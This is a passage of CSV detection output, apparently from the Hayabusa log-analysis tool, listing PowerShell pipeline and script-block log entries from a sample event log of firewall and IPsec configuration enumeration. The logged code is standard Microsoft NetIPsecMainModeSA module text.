$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecIdentity ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeSA""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeSA""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecMainModeSA ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): 